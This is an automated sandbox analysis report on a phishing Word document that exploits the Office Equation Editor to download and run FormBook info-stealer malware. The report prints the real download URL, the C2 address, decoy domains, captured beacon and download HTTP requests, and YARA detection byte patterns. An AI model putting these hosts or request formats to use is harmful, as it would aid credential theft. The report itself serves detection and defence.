Windows Analysis Report
Revised RFQ-PO180911.doc

Overview

General Information

Sample Name: Revised RFQ-PO180911.doc
Analysis ID: 635413
MD5: afaa3f4a9a241593ea30e05773c22980
SHA1: 1d9dabc7f48e7d3c50c3d7d36a371be6bb63746d
SHA256: 25966cc19f04cbbdacdf04249247d606c037cb527669addbfb0d52e0cd948519
Tags: docRFQ

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2068 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1544 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • word.exe (PID: 1988 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: C6E799EEEBA0345DE98B4E9A6AC76B82)
      • dvukljmnr.exe (PID: 2844 cmdline: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw MD5: 9CECB9E88C1FF3D7A4FFC8BFEB27C2E1)
        • dvukljmnr.exe (PID: 940 cmdline: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw MD5: 9CECB9E88C1FF3D7A4FFC8BFEB27C2E1)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • wuapp.exe (PID: 2996 cmdline: C:\Windows\SysWOW64\wuapp.exe MD5: C8EBA45CEF271BED6C2F0E1965D229EA)
              • cmd.exe (PID: 1820 cmdline: /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup
{"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}
Source | Rule | Description | Author | Strings
Revised RFQ-PO180911.doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen
  • 0x5c:$obj2: \objdata
  • 0x7d:$obj2: \objdata
  • 0x315:$obj3: \objupdate
Source | Rule | Description | Author | Strings
00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
Source | Rule | Description | Author | Strings
6.0.dvukljmnr.exe.400000.9.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.0.dvukljmnr.exe.400000.9.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
6.0.dvukljmnr.exe.400000.9.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
5.2.dvukljmnr.exe.160000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.dvukljmnr.exe.160000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Exploits

Source: Network Connection, Author: Joe Security, Data: DestinationIp: 194.9.94.86, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1544, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1544, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe
No Snort rule has matched

AV Detection

Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook
Source: Revised RFQ-PO180911.doc Virustotal: Detection: 31%
Source: Revised RFQ-PO180911.doc ReversingLabs: Detection: 32%
Source: Yara match File source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: http://sanbarts.com/cssati.exe Avira URL Cloud: Label: malware
Source: http://www.sanbarts.com/cssati.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp Avira: detection malicious, Label: EXP/CVE-2018-0798.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Roaming\word.exe ReversingLabs: Detection: 61%
Source: 6.0.dvukljmnr.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.dvukljmnr.exe.160000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.dvukljmnr.exe.400000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.dvukljmnr.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.dvukljmnr.exe.400000.9.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 194.9.94.86 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 45.120.185.113 Port: 80
Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr Stream path '_1715191568/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: C:\krajo\ynpcjm\ntdn\3216792803f64d1292a50b8c7f0c4afc\ibwuyp\qahbtotu\Release\qahbtotu.pdb source: word.exe, 00000004.00000002.945823698.0000000002800000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp, dvukljmnr.exe, 00000005.00000000.914293624.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1182845110.000000000244F000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182267839.00000000002C2000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe.4.dr, nstBFBE.tmp.4.dr
          Source: Binary string: wntdll.pdb source: dvukljmnr.exe, dvukljmnr.exe, 00000006.00000003.923098867.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984351623.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000003.925762664.0000000000740000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000002.1182604769.00000000020D0000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.985104310.00000000009A0000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.983888458.0000000000840000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuapp.pdb source: dvukljmnr.exe, 00000006.00000002.984008037.0000000000504000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.983799814.0000000000030000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose
Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_004026A1 FindFirstFileA
Source: global traffic DNS query: name: sanbarts.com
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 194.9.94.86:80

Networking

Source: C:\Windows\explorer.exe Domain query: www.paypal-caseid521.com
Source: C:\Windows\explorer.exe Network Connect: 98.137.244.37 80
Source: C:\Windows\explorer.exe Domain query: www.storyofsol.com
Source: C:\Windows\explorer.exe Domain query: www.createacarepack.com
Source: Malware configuration extractor URLs: www.rthearts.com/nk6l/
Source: Joe Sandbox View ASN Name: LOOPIASE LOOPIASE
Source: Joe Sandbox View ASN Name: YAHOO-GQ1US YAHOO-GQ1US
Source: global traffic HTTP traffic detected:
  GET /nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi HTTP/1.1
  Host: www.createacarepack.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View IP Address: 194.9.94.86 194.9.94.86
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Content-Type: application/octet-stream
  Last-Modified: Thu, 26 May 2022 00:40:19 GMT
  Accept-Ranges: bytes
  ETag: "4042e42c9970d81:0"
  Server: Microsoft-IIS/10.0
  X-Powered-By: ASP.NET
  Date: Fri, 27 May 2022 19:20:07 GMT
  Content-Length: 299113
Source: global traffic HTTP traffic detected:
  GET /cssati.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: sanbarts.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /cssati.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Connection: Keep-Alive
  Host: www.sanbarts.com
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Fri, 27 May 2022 19:21:49 GMT
  P3P: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
  Vary: Accept-Encoding
  Content-Length: 73
  Content-Type: text/html; charset=iso-8859-1
  Age: 0
  Connection: close
  Server: ATS
  Data Ascii: <h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found
          Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: EQNEDT32.EXE, 00000002.00000002.915025383.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sanbarts.com/33
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914970619.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sanbarts.com/cssati.exe
          Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sanbarts.com/cssati.exej
          Source: explorer.exe, 00000007.00000000.961585251.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000007.00000000.967364013.0000000006450000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.961585251.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: EQNEDT32.EXE, 00000002.00000002.914993763.0000000000933000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sanbarts.com/Couri
          Source: EQNEDT32.EXE, 00000002.00000002.914993763.0000000000933000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sanbarts.com/YR$
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sanbarts.com/cssati.exe
          Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sanbarts.com/cssati.exeC:
          Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sanbarts.com/cssati.exekkC:
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6C29C56C-3D5B-4878-9A01-77B8177CDD57}.tmp
          Source: unknown DNS traffic detected: queries for: sanbarts.com
          Source: global traffic HTTP traffic detected: GET /cssati.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: sanbarts.com Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: GET /cssati.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: www.sanbarts.com
          Source: global traffic HTTP traffic detected: GET /nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi HTTP/1.1 Host: www.createacarepack.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Roaming\word.exe Code function: 4_2_00404FDD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

          E-Banking Fraud

          Source: Yara match File source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: initial sample Static file information: Filename: Revised RFQ-PO180911.doc
          Source: Revised RFQ-PO180911.doc, type: SAMPLE Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe
          Source: Revised RFQ-PO180911.doc, type: SAMPLE Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
